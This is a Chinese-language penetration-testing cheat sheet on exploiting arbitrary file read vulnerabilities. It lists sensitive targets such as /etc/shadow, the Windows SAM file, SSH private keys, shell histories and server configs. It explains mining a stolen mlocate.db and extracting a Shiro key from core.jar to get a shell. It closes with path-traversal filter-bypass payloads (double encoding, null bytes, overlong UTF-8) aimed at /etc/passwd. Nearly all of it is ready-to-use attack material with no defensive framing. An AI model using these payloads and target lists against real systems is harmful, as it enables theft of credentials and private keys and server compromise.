AFR深入利用的一些技巧

敏感文件路径

windows

C:\boot.ini #查看系统版本
C:\Windows\System32\inetsrv\MetaBase.xml #IIS配置文件
C:\Windows\repair\sam #存储系统初次安装的密码
C:\Program Files\mysql\my.ini #Mysql配置
C:\Program Files\mysql\data\mysql\user.MYD #Mysql root
C:\Windows\php.ini #php配置信息
C:\Windows\my.ini #Mysql配置信息

linux

/root/.ssh/authorized_keys #如需登录到远程主机，需要到.ssh目录下，新建authorized_keys文件，并将id_rsa.pub内容复制进去
/root/.ssh/id_rsa #ssh私钥,ssh公钥是id_rsa.pub,私钥登录 ssh -i id_rsa root@IP地址
/root/.ssh/id_ras.keystore #记录每个访问计算机用户的公钥
/root/.ssh/known_hosts
#ssh会把每个访问过计算机的公钥(public key)都记录在~/.ssh/known_hosts。当下次访问相同计算机时，OpenSSH会核对公钥。如果公钥不同，OpenSSH会发出警告， 避免你受到DNS Hijack之类的攻击。
/etc/passwd # 账户信息
/etc/shadow # 账户密码文件
/etc/my.cnf #mysql 配置文件
/etc/httpd/conf/httpd.conf # Apache配置文件
/etc/redhat-release #系统版本 
/root/.bash_history #用户历史命令记录文件
/root/.mysql_history #mysql历史命令记录文件
/var/lib/mlocate/mlocate.db #全文件路径
/proc/self/fd/fd[0-9]*(文件标识符)
/proc/mounts #记录系统挂载设备
/porc/config.gz #内核配置文件
/porc/self/cmdline #当前进程的cmdline参数
/proc/sched_debug #配置文件可以看到当前运行的进程并可以获得对应进程的pid
/proc/pid/cmdline   #可以看到对应pid进程的完整命令行。
/proc/net/fib_trie   #内网IP
/proc/self/environ   #环境变量
/proc/self/loginuid   #当前用户

用户家目录

.bash_history 
.zsh_history
.psql_history
.mysql_history
.profile 
.bashrc
.gitconfig
.viminfo

#暴破所有用户的.bash_history：
../../../home/§root§/.bash_history

主机凭证

/root/.ssh/id_rsa  #私钥
/root/.ssh/authorized_keys  #公钥存储文件
/root/.ssh/id_rsa.keystore
/root/.ssh/known_hosts #记录每个访问计算机用户的公钥

全盘路径⭐

适用于目标机器安装了mlocate的情况，不过一般可能需要root权限，locate命令利用mlocate.db数据库进行全盘文件名搜索，位置在/var/lib/mlocate/mlocate.db，获取到mlocate.db文件后本地利用如下命令输出指定路径：

locate -d mlocate.db /   #输出所有文件路径
locate -d mlocate.db config #输出所有文件名包含config的文件路径

后端配置文件

• java站点
  /WEB-INF/web.xml
/WEB-INF/classes/applicationContext.xml
/WEB-INF/classes/xxx/xxx/xxx.class
core.jar: 如果遇到Shiro站点，可以直接利用全盘路径找到core.jar，去下载core.jar，下载后反编译搜索Base64.decode直接找key，进而getshell。
• tomcat
  /usr/local/tomcat/conf/tomcat-users.xml
• nginx
  /www/nginx/conf/nginx.conf
/etc/nginx/nginx.conf
/usr/local/nginx/conf/nginx.conf
/usr/local/etc/nginx/nginx.conf
• apache
  /etc/httpd/conf/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
• redis
  /etc/redis.conf
• ssh
  /etc/ssh/sshd_config

日志文件

• tomcat
  可以先找到/tomcat/bin/catalina.sh，里边有log的配置路径
  /webapps/ROOT/logs/catalina.out

• apache
  /var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/httpd/access_log
/etc/httpd/logs/access_log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log

• nginx
  /var/log/nginx/access.log
/var/log/nginx/error.log
/usr/local/var/log/nginx/access.log
/usr/local/nginx/logs

• jetty

  /usr/local/services/jetty-8.1.16/logs/stderrout.log
/usr/local/services/jetty-8.1.16/etc/jetty.xml

bypass

1. url编码代替.或者/，如使用%2F代替/
   ?filename=..%2F..%2F..%2F..%2Fetc%2Fpasswd
2. 二次编码(%25)
   ?filename=..%252F..%252F..%252F..%252Fetc%2Fpasswd
3. 加入+
   ?filename=.+./.+./bin/redacted.dll
4. %00
   ?filename=.%00./file.php
/etc/passwd%00.jpg
5. \
?filename=..%5c..%5c/windows/win.ini
6. Java %c0%ae 安全模式绕过
   ?filename=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd